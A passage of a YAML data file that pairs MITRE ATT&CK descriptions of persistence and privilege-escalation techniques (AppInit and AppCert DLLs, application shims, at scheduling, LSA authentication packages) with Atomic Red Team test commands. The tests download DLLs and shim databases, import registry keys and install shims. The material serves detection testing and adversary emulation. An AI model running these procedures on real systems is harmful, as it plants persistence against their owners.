https://attack.mitre.org/techniques/T1098/001 - - source_name: Create Azure Service Principal - url: https://docs.microsoft.com/en-us/cli/azure/create-an-azure-service-principal-azure-cli?toc=%2Fazure%2Fazure-resource-manager%2Ftoc.json&view=azure-cli-latest - description: Microsoft. (2020, January 8). Create an Azure service principal - with Azure CLI. Retrieved January 19, 2020. - - source_name: Blue Cloud of Death - url: https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1 - description: 'Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming - Azure. Retrieved October 23, 2019.' - - source_name: Blue Cloud of Death Video - url: https://www.youtube.com/watch?v=wQ1CuAPnrLM&feature=youtu.be&t=2815 - description: 'Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming - Azure. 
Retrieved November 21, 2019.' - - source_name: Why AAD Service Principals - url: https://github.com/microsoft/AzureSuperpowers/blob/master/docs/AzureSuperpowers.md#why-aad-service-principals - description: Microsoft. (2019, September 23). Azure Superpowers Lab Manual. - Retrieved January 19, 2020. - - source_name: Demystifying Azure AD Service Principals - url: https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/ - description: Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service - Principals. Retrieved January 19, 2020. - - source_name: GCP SSH Key Add - url: https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add - description: Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved - October 1, 2020. - - source_name: Expel IO Evil in AWS - url: https://expel.io/blog/finding-evil-in-aws/ - description: A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding - Evil in AWS. Retrieved June 25, 2020. - - source_name: Expel Behind the Scenes - url: https://expel.io/blog/behind-the-scenes-expel-soc-alert-aws/ - description: 'S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020, - July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved - October 1, 2020.' - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Additional Cloud Credentials - description: |- - Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment. 
- - Adversaries may add credentials for Azure Service Principals in addition to existing legitimate credentials(Citation: Create Azure Service Principal) to victim Azure accounts.(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) Azure Service Principals support both password and certificate credentials.(Citation: Why AAD Service Principals) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az [PowerShell](https://attack.mitre.org/techniques/T1059/001) modules.(Citation: Demystifying Azure AD Service Principals) - - After gaining access through [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries may generate or import their own SSH keys using either the CreateKeyPair or ImportKeyPair API in AWS or the gcloud compute os-login ssh-keys add command in GCP.(Citation: GCP SSH Key Add) This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind the Scenes) - id: attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-10-05T16:43:27.024Z' - created: '2020-01-19T16:10:15.008Z' - x_mitre_contributors: - - Expel - - Oleg Kolesnikov, Securonix - - Jannie Li, Microsoft Threat Intelligence Center (MSTIC) - x_mitre_version: '2.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - - User - x_mitre_detection: |- - Monitor Azure Activity Logs for service principal modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account. - - Monitor for use of credentials at unusual times or to unusual systems or services. This may also correlate with other suspicious activity. 
- x_mitre_data_sources: - - Stackdriver logs - - GCP audit logs - - AWS CloudTrail logs - - Azure activity logs - x_mitre_platforms: - - Azure AD - - Azure - - AWS - - GCP - atomic_tests: [] - T1546.009: - technique: - external_references: - - source_name: mitre-attack - external_id: T1546.009 - url: https://attack.mitre.org/techniques/T1546/009 - - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process - description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: - A Technical Survey Of Common And Trending Process Injection Techniques. - Retrieved December 7, 2017.' - source_name: Endgame Process Injection July 2017 - - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 - description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. - Retrieved June 6, 2016. - source_name: TechNet Autoruns - - url: https://forum.sysinternals.com/appcertdlls_topic12546.html - description: Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls. - Retrieved December 18, 2017. - source_name: Sysinternals AppCertDlls Oct 2007 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: AppCert DLLs - description: "Adversaries may establish persistence and/or elevate privileges - by executing malicious content triggered by AppCert DLLs loaded into processes. - Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs - Registry key under HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session - Manager\\ are loaded into every process that calls the ubiquitously - used application programming interface (API) functions CreateProcess, - CreateProcessAsUser, CreateProcessWithLoginW, CreateProcessWithTokenW, - or WinExec. 
(Citation: Endgame Process Injection July 2017)\n\nSimilar - to [Process Injection](https://attack.mitre.org/techniques/T1055), this value - can be abused to obtain elevated privileges by causing a malicious DLL to - be loaded and run in the context of separate processes on the computer. Malicious - AppCert DLLs may also provide persistence by continuously being triggered - by API activity. " - id: attack-pattern--7d57b371-10c2-45e5-b3cc-83a8fb380e4c - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-24T20:22:45.298Z' - created: '2020-01-24T14:47:41.795Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_effective_permissions: - - Administrator - - SYSTEM - x_mitre_permissions_required: - - Administrator - - SYSTEM - x_mitre_detection: "Monitor DLL loads by processes, specifically looking for - DLLs that are not recognized or not normally loaded into a process. Monitor - the AppCertDLLs Registry value for modifications that do not correlate with - known software, patch cycles, etc. Monitor and analyze application programming - interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx - and RegSetValueEx. (Citation: Endgame Process Injection July 2017) \n\nTools - such as Sysinternals Autoruns may overlook AppCert DLLs as an auto-starting - location. (Citation: TechNet Autoruns) (Citation: Sysinternals AppCertDlls - Oct 2007)\n\nLook for abnormal process behavior that may be due to a process - loading a malicious DLL. Data and events should not be viewed in isolation, - but as part of a chain of behavior that could lead to other activities, such - as making network connections for Command and Control, learning details about - the environment through Discovery, and conducting Lateral Movement." 
- x_mitre_data_sources: - - Windows Registry - - Process command-line parameters - - Process monitoring - - Loaded DLLs - x_mitre_platforms: - - Windows - atomic_tests: [] - T1546.010: - technique: - external_references: - - source_name: mitre-attack - external_id: T1546.010 - url: https://attack.mitre.org/techniques/T1546/010 - - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process - description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: - A Technical Survey Of Common And Trending Process Injection Techniques. - Retrieved December 7, 2017.' - source_name: Endgame Process Injection July 2017 - - url: https://support.microsoft.com/en-us/kb/197571 - description: Microsoft. (2006, October). Working with the AppInit_DLLs registry - value. Retrieved July 15, 2015. - source_name: AppInit Registry - - url: https://msdn.microsoft.com/en-us/library/dn280412 - description: Microsoft. (n.d.). AppInit DLLs and Secure Boot. Retrieved July - 15, 2015. - source_name: AppInit Secure Boot - - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 - description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. - Retrieved June 6, 2016. - source_name: TechNet Autoruns - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: AppInit DLLs - description: "Adversaries may establish persistence and/or elevate privileges - by executing malicious content triggered by AppInit DLLs loaded into processes. - Dynamic-link libraries (DLLs) that are specified in the AppInit_DLLs - value in the Registry keys HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows - NT\\CurrentVersion\\Windows or HKEY_LOCAL_MACHINE\\Software\\Wow6432Node\\Microsoft\\Windows - NT\\CurrentVersion\\Windows are loaded by user32.dll into every process - that loads user32.dll. 
In practice this is nearly every program, since user32.dll - is a very common library. (Citation: Endgame Process Injection July 2017)\n\nSimilar - to Process Injection, these values can be abused to obtain elevated privileges - by causing a malicious DLL to be loaded and run in the context of separate - processes on the computer. (Citation: AppInit Registry) Malicious AppInit - DLLs may also provide persistence by continuously being triggered by API activity. - \n\nThe AppInit DLL functionality is disabled in Windows 8 and later versions - when secure boot is enabled. (Citation: AppInit Secure Boot)" - id: attack-pattern--cc89ecbd-3d33-4a41-bcca-001e702d18fd - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-24T20:34:09.996Z' - created: '2020-01-24T14:52:25.589Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_system_requirements: - - Secure boot disabled on systems running Windows 8 and later - x_mitre_effective_permissions: - - Administrator - - SYSTEM - x_mitre_permissions_required: - - Administrator - x_mitre_detection: "Monitor DLL loads by processes that load user32.dll and - look for DLLs that are not recognized or not normally loaded into a process. - Monitor the AppInit_DLLs Registry values for modifications that do not correlate - with known software, patch cycles, etc. Monitor and analyze application programming - interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx - and RegSetValueEx. (Citation: Endgame Process Injection July - 2017)\n\nTools such as Sysinternals Autoruns may also be used to detect system - changes that could be attempts at persistence, including listing current AppInit - DLLs. (Citation: TechNet Autoruns) \n\nLook for abnormal process behavior - that may be due to a process loading a malicious DLL. 
Data and events should - not be viewed in isolation, but as part of a chain of behavior that could - lead to other activities, such as making network connections for Command and - Control, learning details about the environment through Discovery, and conducting - Lateral Movement." - x_mitre_data_sources: - - Windows Registry - - Process command-line parameters - - Process monitoring - - Loaded DLLs - x_mitre_platforms: - - Windows - identifier: T1546.010 - atomic_tests: - - name: Install AppInit Shim - auto_generated_guid: a58d9386-3080-4242-ab5f-454c16503d18 - description: "AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs - to be loaded into each user mode process on the system. Upon succesfully execution, - \nyou will see the message \"The operation completed successfully.\" Each - time the DLL is loaded, you will see a message box with a message of \"Install - AppInit Shim DLL was called!\" appear.\nThis will happen regularly as your - computer starts up various applications and may in fact drive you crazy. A - reliable way to make the message box appear and verify the \nAppInit Dlls - are loading is to start the notepad application. 
Be sure to run the cleanup - commands afterwards so you don't keep getting message boxes showing up\n" - supported_platforms: - - windows - input_arguments: - registry_file: - description: Windows Registry File - type: Path - default: PathToAtomicsFolder\T1546.010\src\T1546.010.reg - registry_cleanup_file: - description: Windows Registry File - type: Path - default: PathToAtomicsFolder\T1546.010\src\T1546.010-cleanup.reg - dependency_executor_name: powershell - dependencies: - - description: 'Reg files must exist on disk at specified locations (#{registry_file} - and #{registry_cleanup_file}) - -' - prereq_command: 'if ((Test-Path #{registry_file}) -and (Test-Path #{registry_cleanup_file})) - {exit 0} else {exit 1} - -' - get_prereq_command: | - [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - New-Item -Type Directory (split-path #{registry_file}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/src/T1546.010.reg" -OutFile "#{registry_file}" - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/src/T1546.010-cleanup.reg" -OutFile "#{registry_cleanup_file}" - - description: 'DLL''s must exist in the C:\Tools directory (T1546.010.dll and - T1546.010x86.dll) - -' - prereq_command: 'if ((Test-Path c:\Tools\T1546.010.dll) -and (Test-Path c:\Tools\T1546.010x86.dll)) - {exit 0} else {exit 1} - -' - get_prereq_command: | - New-Item -Type Directory C:\Tools -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/bin/T1546.010.dll" -OutFile C:\Tools\T1546.010.dll - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/bin/T1546.010x86.dll" -OutFile C:\Tools\T1546.010x86.dll - executor: - command: 'reg.exe import #{registry_file} - -' - cleanup_command: 'reg.exe import #{registry_cleanup_file} >nul 2>&1 - -' - 
name: command_prompt - elevation_required: true - T1546.011: - technique: - external_references: - - source_name: mitre-attack - external_id: T1546.011 - url: https://attack.mitre.org/techniques/T1546/011 - - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process - description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: - A Technical Survey Of Common And Trending Process Injection Techniques. - Retrieved December 7, 2017.' - source_name: Endgame Process Injection July 2017 - - source_name: FireEye Application Shimming - url: http://files.brucon.org/2015/Tomczak_and_Ballenthin_Shims_for_the_Win.pdf - description: Ballenthin, W., Tomczak, J.. (2015). The Real Shim Shary. Retrieved - May 4, 2020. - - url: https://www.blackhat.com/docs/eu-15/materials/eu-15-Pierce-Defending-Against-Malicious-Application-Compatibility-Shims-wp.pdf - description: Pierce, Sean. (2015, November). Defending Against Malicious Application - Compatibility Shims. Retrieved June 22, 2017. - source_name: Black Hat 2015 App Shim - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Application Shimming - description: "Adversaries may establish persistence and/or elevate privileges - by executing malicious content triggered by application shims. The Microsoft - Windows Application Compatibility Infrastructure/Framework (Application Shim) - was created to allow for backward compatibility of software as the operating - system codebase changes over time. For example, the application shimming feature - allows developers to apply fixes to applications (without rewriting code) - that were created for Windows XP so that it will work with Windows 10. 
(Citation: - Endgame Process Injection July 2017)\n\nWithin the framework, shims are created - to act as a buffer between the program (or more specifically, the Import Address - Table) and the Windows OS. When a program is executed, the shim cache is referenced - to determine if the program requires the use of the shim database (.sdb). - If so, the shim database uses hooking to redirect the code as necessary in - order to communicate with the OS. \n\nA list of all shims currently installed - by the default Windows installer (sdbinst.exe) is kept in:\n\n* %WINDIR%\\AppPatch\\sysmain.sdb - and\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\installedsdb\n\nCustom - databases are stored in:\n\n* %WINDIR%\\AppPatch\\custom & %WINDIR%\\AppPatch\\AppPatch64\\Custom - and\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\custom\n\nTo - keep shims secure, Windows designed them to run in user mode so they cannot - modify the kernel and you must have administrator privileges to install a - shim. However, certain shims can be used to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) - (UAC and RedirectEXE), inject DLLs into processes (InjectDLL), disable Data - Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), - and intercept memory addresses (GetProcAddress).\n\nUtilizing these shims - may allow an adversary to perform several malicious acts such as elevate privileges, - install backdoors, disable defenses like Windows Defender, etc. (Citation: - FireEye Application Shimming) Shims can also be abused to establish persistence - by continuously being invoked by affected programs." 
- id: attack-pattern--42fe883a-21ea-4cfb-b94a-78b6476dcc83 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-05-04T19:05:30.140Z' - created: '2020-01-24T14:56:24.231Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - x_mitre_detection: |- - There are several public tools available that will detect shims that are currently available (Citation: Black Hat 2015 App Shim): - - * Shim-Process-Scanner - checks memory of every running process for any shim flags - * Shim-Detector-Lite - detects installation of custom shim databases - * Shim-Guard - monitors registry for any shim installations - * ShimScanner - forensic tool to find active shims in memory - * ShimCacheMem - Volatility plug-in that pulls shim cache from memory (note: shims are only cached after reboot) - - Monitor process execution for sdbinst.exe and command-line arguments for potential indications of application shim abuse. - x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - Windows Registry - x_mitre_platforms: - - Windows - identifier: T1546.011 - atomic_tests: - - name: Application Shim Installation - auto_generated_guid: 9ab27e22-ee62-4211-962b-d36d9a0e6a18 - description: "Install a shim database. This technique is used for privilege - escalation and bypassing user access control.\nUpon execution, \"Installation - of AtomicShim complete.\" will be displayed. To verify the shim behavior, - run \nthe AtomicTest.exe from the \\\\T1546.011\\\\bin - directory. You should see a message box appear\nwith \"Atomic Shim DLL Test!\" - as defined in the AtomicTest.dll. 
To better understand what is happening, - review\nthe source code files is the \\\\T1546.011\\\\src - directory.\n" - supported_platforms: - - windows - input_arguments: - file_path: - description: Path to the shim database file - type: String - default: PathToAtomicsFolder\T1546.011\bin\AtomicShimx86.sdb - dependency_executor_name: powershell - dependencies: - - description: 'Shim database file must exist on disk at specified location - (#{file_path}) - -' - prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} - -' - get_prereq_command: | - [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - New-Item -Type Directory (split-path #{file_path}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicShimx86.sdb" -OutFile "#{file_path}" - - description: 'AtomicTest.dll must exist at c:\Tools\AtomicTest.dll - -' - prereq_command: 'if (Test-Path c:\Tools\AtomicTest.dll) {exit 0} else {exit - 1} - -' - get_prereq_command: | - New-Item -Type Directory (split-path c:\Tools\AtomicTest.dll) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicTest.dll" -OutFile c:\Tools\AtomicTest.dll - executor: - command: 'sdbinst.exe #{file_path} - -' - cleanup_command: 'sdbinst.exe -u #{file_path} >nul 2>&1 - -' - name: command_prompt - elevation_required: true - - name: New shim database files created in the default shim database directory - auto_generated_guid: aefd6866-d753-431f-a7a4-215ca7e3f13d - description: | - Upon execution, check the "C:\Windows\apppatch\Custom\" folder for the new shim database - - https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html - supported_platforms: - - windows - executor: - command: | - Copy-Item $PathToAtomicsFolder\T1546.011\bin\T1546.011CompatDatabase.sdb 
C:\Windows\apppatch\Custom\T1546.011CompatDatabase.sdb - Copy-Item $PathToAtomicsFolder\T1546.011\bin\T1546.011CompatDatabase.sdb C:\Windows\apppatch\Custom\Custom64\T1546.011CompatDatabase.sdb - cleanup_command: | - Remove-Item C:\Windows\apppatch\Custom\T1546.011CompatDatabase.sdb -ErrorAction Ignore - Remove-Item C:\Windows\apppatch\Custom\Custom64\T1546.011CompatDatabase.sdb -ErrorAction Ignore - name: powershell - elevation_required: true - - name: Registry key creation and/or modification events for SDB - auto_generated_guid: 9b6a06f9-ab5e-4e8d-8289-1df4289db02f - description: | - Create registry keys in locations where fin7 typically places SDB patches. Upon execution, output will be displayed describing - the registry keys that were created. These keys can also be viewed using the Registry Editor. - - https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html - supported_platforms: - - windows - executor: - command: | - New-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom" -Name "AtomicRedTeamT1546.011" -Value "AtomicRedTeamT1546.011" - New-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB" -Name "AtomicRedTeamT1546.011" -Value "AtomicRedTeamT1546.011" - cleanup_command: | - Remove-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom" -Name "AtomicRedTeamT1546.011" -ErrorAction Ignore - Remove-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB" -Name "AtomicRedTeamT1546.011" -ErrorAction Ignore - name: powershell - elevation_required: true - T1053.001: - technique: - external_references: - - source_name: mitre-attack - external_id: T1053.001 - url: https://attack.mitre.org/techniques/T1053/001 - - source_name: Kifarunix - Task Scheduling in Linux - url: https://kifarunix.com/scheduling-tasks-using-at-command-in-linux/ - description: Koromicha. 
(2019, September 7). Scheduling tasks using at command - in Linux. Retrieved December 3, 2019. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: At (Linux) - description: |- - Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) command within Linux operating systems enables administrators to schedule tasks.(Citation: Kifarunix - Task Scheduling in Linux) - - An adversary may use [at](https://attack.mitre.org/software/S0110) in Linux environments to execute programs at system startup or on a scheduled basis for persistence. [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account. - id: attack-pattern--6636bc83-0611-45a6-b74f-1f3daf635b8e - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: execution - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-23T22:35:13.112Z' - created: '2019-12-03T12:59:36.749Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_remote_support: true - x_mitre_detection: "Monitor scheduled task creation using command-line invocation. - Legitimate scheduled tasks may be created during installation of new software - or through system administration functions. Look for changes to tasks that - do not correlate with known software, patch cycles, etc. \n\nSuspicious program - execution through scheduled tasks may show up as outlier processes that have - not been seen before when compared against historical data. 
Data and events - should not be viewed in isolation, but as part of a chain of behavior that - could lead to other activities, such as network connections made for Command - and Control, learning details about the environment through Discovery, and - Lateral Movement." - x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - x_mitre_platforms: - - Linux - identifier: T1053.001 - atomic_tests: - - name: At - Schedule a job - auto_generated_guid: 7266d898-ac82-4ec0-97c7-436075d0d08e - description: 'This test submits a command to be run in the future by the `at` - daemon. - -' - supported_platforms: - - linux - input_arguments: - time_spec: - description: Time specification of when the command should run - type: String - default: now + 1 minute - at_command: - description: The command to be run - type: String - default: echo Hello from Atomic Red Team - dependency_executor_name: sh - dependencies: - - description: 'The `at` and `atd` executables must exist in the PATH - -' - prereq_command: 'which at && which atd - -' - get_prereq_command: 'echo ''Please install `at` and `atd`; they were not found - in the PATH (Package name: `at`)'' - -' - - description: 'The `atd` daemon must be running - -' - prereq_command: 'systemctl status atd || service atd status - -' - get_prereq_command: 'echo ''Please start the `atd` daemon (sysv: `service - atd start` ; systemd: `systemctl start atd`)'' - -' - executor: - name: sh - elevation_required: false - command: 'echo "#{at_command}" | at #{time_spec} - -' - T1053.002: - technique: - external_references: - - source_name: mitre-attack - external_id: T1053.002 - url: https://attack.mitre.org/techniques/T1053/002 - - url: https://twitter.com/leoloobeek/status/939248813465853953 - description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved - December 12, 2017. 
- source_name: Twitter Leoloobeek Scheduled Task - - url: https://social.technet.microsoft.com/Forums/en-US/e5bca729-52e7-4fcb-ba12-3225c564674c/scheduled-tasks-history-retention-settings?forum=winserver8gen - description: Satyajit321. (2015, November 3). Scheduled Tasks History Retention - settings. Retrieved December 12, 2017. - source_name: TechNet Forum Scheduled Task Operational Setting - - url: https://technet.microsoft.com/library/dd315590.aspx - description: Microsoft. (n.d.). General Task Registration. Retrieved December - 12, 2017. - source_name: TechNet Scheduled Task Events - - source_name: Microsoft Scheduled Task Events Win10 - url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-object-access-events - description: Microsoft. (2017, May 28). Audit Other Object Access Events. - Retrieved June 27, 2019. - - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 - description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. - Retrieved June 6, 2016. - source_name: TechNet Autoruns - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: At (Windows) - description: "Adversaries may abuse the at.exe utility to perform - task scheduling for initial or recurring execution of malicious code. The - [at](https://attack.mitre.org/software/S0110) utility exists as an executable - within Windows for scheduling tasks at a specified time and date. Using [at](https://attack.mitre.org/software/S0110) - requires that the Task Scheduler service be running, and the user to be logged - on as a member of the local Administrators group. \n\nAn adversary may use - at.exe in Windows environments to execute programs at system - startup or on a scheduled basis for persistence. 
[at](https://attack.mitre.org/software/S0110) - can also be abused to conduct remote Execution as part of Lateral Movement - and or to run a process under the context of a specified account (such as - SYSTEM).\n\nNote: The at.exe command line utility has been deprecated - in current versions of Windows in favor of schtasks." - id: attack-pattern--f3d95a1f-bba2-44ce-9af7-37866cd63fd0 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: execution - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-24T13:43:40.776Z' - created: '2019-11-27T13:52:45.853Z' - x_mitre_data_sources: - - File monitoring - - Process command-line parameters - - Process monitoring - - Windows event logs - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_remote_support: true - x_mitre_permissions_required: - - Administrator - x_mitre_detection: |- - Monitor process execution from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\System32\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc. - - Configure event logging for scheduled task creation and changes by enabling the "Microsoft-Windows-TaskScheduler/Operational" setting within the event logging service. 
(Citation: TechNet Forum Scheduled Task Operational Setting) Several events will then be logged on scheduled task activity, including: (Citation: TechNet Scheduled Task Events)(Citation: Microsoft Scheduled Task Events Win10) - - * Event ID 106 on Windows 7, Server 2008 R2 - Scheduled task registered - * Event ID 140 on Windows 7, Server 2008 R2 / 4702 on Windows 10, Server 2016 - Scheduled task updated - * Event ID 141 on Windows 7, Server 2008 R2 / 4699 on Windows 10, Server 2016 - Scheduled task deleted - * Event ID 4698 on Windows 10, Server 2016 - Scheduled task created - * Event ID 4700 on Windows 10, Server 2016 - Scheduled task enabled - * Event ID 4701 on Windows 10, Server 2016 - Scheduled task disabled - - Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns) - - Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data. - x_mitre_platforms: - - Windows - identifier: T1053.002 - atomic_tests: - - name: At.exe Scheduled task - auto_generated_guid: 4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8 - description: | - Executes cmd.exe - Note: deprecated in Windows 8+ - - Upon successful execution, cmd.exe will spawn at.exe and create a scheduled task that will spawn cmd at a specific time. 
- supported_platforms: - - windows - executor: - name: command_prompt - elevation_required: false - command: 'at 13:20 /interactive cmd - -' - T1547.002: - technique: - id: attack-pattern--b8cfed42-6a8a-4989-ad72-541af74475ec - description: |- - Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system. (Citation: MSDN Authentication Packages) - - Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ with the key value of "Authentication Packages"=<target binary>. The binary will then be executed by the system when the authentication packages are loaded. - name: Authentication Package - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1547.002 - url: https://attack.mitre.org/techniques/T1547/002 - - url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx - description: Microsoft. (n.d.). Authentication Packages. Retrieved March 1, - 2017. - source_name: MSDN Authentication Packages - - url: http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html - description: Graeber, M. (2014, October). Analysis of Malicious Security Support - Provider DLLs. Retrieved March 1, 2017. - source_name: Graeber 2014 - - url: https://technet.microsoft.com/en-us/library/dn408187.aspx - description: Microsoft. (2013, July 31). Configuring Additional LSA Protection. - Retrieved June 24, 2015. 
